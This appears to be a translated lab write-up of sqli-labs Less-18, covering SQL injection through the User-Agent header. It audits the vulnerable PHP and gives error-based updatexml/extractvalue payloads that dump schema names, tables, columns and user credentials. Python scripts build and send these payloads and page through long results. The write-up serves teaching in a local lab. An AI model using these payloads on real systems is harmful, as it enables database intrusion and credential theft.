SQL Injection Less18 (Header Injection + Error-Based Injection)
2022-07-25 10:31:00 【开心星人】

Log in with the valid account Dumb:Dumb.

Source code audit
```php
<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);

function check_input($value)
{
    if(!empty($value))
    {
        // truncation (see comments)
        $value = substr($value,0,20);
    }
    // Stripslashes if magic quotes enabled
    if (get_magic_quotes_gpc())
    {
        $value = stripslashes($value);
    }
    // Quote if not a number
    if (!ctype_digit($value))
    {
        $value = "'" . mysql_real_escape_string($value) . "'";
    }
    else
    {
        $value = intval($value);
    }
    return $value;
}

$uagent = $_SERVER['HTTP_USER_AGENT'];
$IP = $_SERVER['REMOTE_ADDR'];
echo "<br>";
echo 'Your IP ADDRESS is: ' .$IP;
echo "<br>";
//echo 'Your User Agent is: ' .$uagent;

// take the variables
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
    $uname = check_input($_POST['uname']);
    $passwd = check_input($_POST['passwd']);
    /*
    echo 'Your Your User name:'. $uname;
    echo "<br>";
    echo 'Your Password:'. $passwd;
    echo "<br>";
    echo 'Your User Agent String:'. $uagent;
    echo "<br>";
    echo 'Your User Agent String:'. $IP;
    */

    //logging the connection parameters to a file for analysis.
    $fp=fopen('result.txt','a');
    fwrite($fp,'User Agent:'.$uname."\n");
    fclose($fp);

    $sql="SELECT users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
    $result1 = mysql_query($sql);
    $row1 = mysql_fetch_array($result1);

    if($row1)
    {
        echo '<font color= "#FFFF00" font size = 3 >';
        $insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";
        mysql_query($insert);
        //echo 'Your IP ADDRESS is: ' .$IP;
        echo "</font>";
        //echo "<br>";
        echo '<font color= "#0000ff" font size = 3 >';
        echo 'Your User Agent is: ' .$uagent;
        echo "</font>";
        echo "<br>";
        print_r(mysql_error());
        echo "<br><br>";
        echo '<img src="../images/flag.jpg" />';
        echo "<br>";
    }
    else
    {
        echo '<font color= "#0000ff" font size="3">';
        //echo "Try again looser";
        print_r(mysql_error());
        echo "</br>";
        echo "</br>";
        echo '<img src="../images/slap.jpg" />';
        echo "</font>";
    }
}
?>
```
The check_input function is the one already covered in SQL Injection Less17 (error-based injection + subquery); see the previous lesson. The only change is `$value = substr($value,0,20);`: this time the first twenty characters of the input are kept, and whatever survives the truncation is then quoted and escaped with mysql_real_escape_string unless it is purely numeric.
$uagent = $_SERVER['HTTP_USER_AGENT'];
$IP = $_SERVER['REMOTE_ADDR'];
$_SERVER is one of PHP's predefined superglobals and can be used anywhere without declaration; it is an array holding information such as request headers, paths and script locations.
Its elements are populated by the web server, and there is no guarantee that every server provides all of them: some may omit entries, others may add entries that are not documented. The point that matters for this lesson is where the two values come from: every HTTP_* entry, HTTP_USER_AGENT included, is copied verbatim from a request header and is therefore entirely under the client's control, whereas REMOTE_ADDR is taken from the TCP connection rather than from anything the client sends.
$uname = check_input($_POST['uname']);
$passwd = check_input($_POST['passwd']);
This time $passwd also goes through check_input, so the passwd field can no longer be used for SQL injection; both form fields are truncated, quoted and escaped.
$sql="SELECT users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
$result1 = mysql_query($sql);
$row1 = mysql_fetch_array($result1);
This is a plain SELECT. Because $row1 must be non-empty to enter the if branch below, the uname and passwd we submit must belong to a real, existing user (Dumb:Dumb here); the vulnerable code only runs after a successful login.
Core code
$insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";
mysql_query($insert);
$uagent is interpolated straight into the INSERT statement with no escaping, and any MySQL error the INSERT raises is echoed back to the page by print_r(mysql_error()). The unescaped header gives us the injection point and the echoed error gives us the exfiltration channel, which is what makes error-based injection work here (the fix would be to bind $uagent, $IP and $uname as parameters of a prepared statement instead of interpolating them).
We control $uagent, so we use it to deliver the payload.
The statement we want MySQL to execute is:
INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('' or updatexml(1, concat('#', database()), 0), 1, 1) #
So set $uagent (the User-Agent header) to:
' or updatexml(1, concat('#', database()), 0), 1, 1) #
The leading quote closes the empty uagent literal, updatexml() is evaluated as the first column value and throws an XPath error containing database(), the `1, 1` supplies the remaining two columns ourselves, and the trailing `#` comments out the original `', '$IP', $uname)` tail so the column count still matches.
Alternatively, `' and updatexml(1, concat('#', database()), 0) and '1'='1` keeps the original three columns intact and needs no comment: the injected expression simply becomes the value stored in uagent.
Table names in the security database:
' or updatexml(1, concat("#", (select group_concat(table_name) from information_schema.tables where table_schema="security")), 0),1,1)#
Column names of users:
' or updatexml(1, concat("#", (select group_concat(column_name) from information_schema.columns where table_schema="security" and table_name="users")), 0),1,1) #
Credentials:
' or updatexml(1, concat("#", (select group_concat(username,password) from users)), 0),1,1) #
One caveat: the XPATH syntax error only reports the first 32 characters of the string handed to updatexml()/extractvalue(), and the "#" marker uses one of them, so a long group_concat result has to be read in pieces by wrapping the subquery in substr(..., offset, 31) and stepping the offset.
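As an added example (not from the original post and not part of sqli-labs), the following Python models the Less-18 data flow offline so the payloads above can be reasoned about without a lab instance: a re-implementation of check_input() showing why the uname/passwd path is closed, the User-Agent payload and the INSERT it produces, a parser for the XPATH syntax error text that carries the leaked value, and the substr() paging needed for the 32-character limit. The function names (check_input, build_uagent_payload, build_insert, parse_xpath_error, chunked_exprs) and the sample error string are this example's own.

```python
"""Offline model of the Less-18 injection path (added example, not the
sqli-labs code).  All names below are this example's own."""
import re
from typing import List, Optional

# Escapes applied by mysql_real_escape_string(); magic_quotes assumed off.
_ESCAPES = {"\\": "\\\\", "'": "\\'", '"': '\\"', "\x00": "\\0",
            "\n": "\\n", "\r": "\\r", "\x1a": "\\Z"}


def check_input(value: str) -> str:
    """Python re-implementation of the page's check_input(): keep only the
    first 20 characters, then quote+escape unless the value is all digits.
    Everything arriving via uname/passwd goes through this, which is why
    the form fields are a dead end for injection in Less-18."""
    value = value[:20]
    if value.isdigit():
        return str(int(value))
    return "'" + "".join(_ESCAPES.get(ch, ch) for ch in value) + "'"


def build_uagent_payload(expr: str) -> str:
    """User-Agent that closes the uagent literal, fires updatexml() with an
    invalid XPath built from expr, supplies the remaining two VALUES
    columns itself and comments out the original tail."""
    return f"' or updatexml(1, concat('#', ({expr})), 0), 1, 1) #"


def build_insert(uagent: str, ip: str, uname: str) -> str:
    """Mirror of the page's $insert string: uagent and ip are interpolated
    raw; uname is expected to have been through check_input() already."""
    return ("INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, "
            f"`username`) VALUES ('{uagent}', '{ip}', {uname})")


# Shape of the MySQL error echoed by print_r(mysql_error()) on the page.
_XPATH_ERR = re.compile(r"XPATH syntax error: '#(.*)'")


def parse_xpath_error(message: str) -> Optional[str]:
    """Recover the leaked value from an updatexml()/extractvalue() error,
    e.g. "XPATH syntax error: '#security'" -> "security".  Returns None
    for any other error text."""
    m = _XPATH_ERR.search(message)
    return m.group(1) if m else None


def chunked_exprs(expr: str, total_len: int, width: int = 31) -> List[str]:
    """The XPath error shows at most 32 characters, one of which is the '#'
    marker, so a long result (a group_concat of usernames and passwords)
    is read through substr() windows of 31 characters each."""
    return [f"substr(({expr}),{start},{width})"
            for start in range(1, total_len + 1, width)]


if __name__ == "__main__":
    # Constructed sample of what the server would echo for database().
    sample_error = "XPATH syntax error: '#security'"
    print(check_input("Dumb' or 1=1 #"))      # quoted and escaped: harmless
    print(build_insert(build_uagent_payload("database()"), "127.0.0.1",
                       check_input("Dumb")))
    print(parse_xpath_error(sample_error))     # security
    creds = "select group_concat(username,0x3a,password) from users"
    for window in chunked_exprs(creds, 93):
        print(build_uagent_payload(window))    # one request per 31-char slice
```

The loop at the end prints the sequence of User-Agent values you would send one after another, feeding each response through parse_xpath_error and concatenating the pieces; total_len is whatever length(...) of the same subquery reported in an earlier request.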
A small requests script that sends the payload in the User-Agent header and checks whether the success page (flag.jpg) came back:

```python
#coding:utf-8
import requests

url = "http://localhost/sqli-labs-master/sqli-labs-master/Less-18/"
marker = "flag"  # flag.jpg is only rendered on a successful login, i.e. when the INSERT branch ran
print("start!")
# a valid account is required: the INSERT only runs after the SELECT finds a row
key = {'uname': "admin", 'passwd': "admin"}
headers = {
    "Host": "localhost",
    # the payload travels in the User-Agent header; here it pages through schema names
    "User-Agent": "'and extractvalue(1,concat('~',(select schema_name from information_schema.schemata limit 5,1),'~')) and '1'='1",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
    "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
    "Accept-Encoding": "gzip, deflate",
    "Content-Type": "application/x-www-form-urlencoded",
    "Referer": "http://localhost/sqli-labs-master/sqli-labs-master/Less-18/",
    "Connection": "keep-alive",
    "Upgrade-Insecure-Requests": "1",
    "Pragma": "no-cache",
    "Cache-Control": "no-cache"
}
# requests computes Content-Length itself; do not hard-code it
res = requests.post(url, headers=headers, data=key).text
if marker in res:
    print("fish!")
print(res)  # the leaked value appears in the echoed "XPATH syntax error: '~...~'" line
print("end!")
```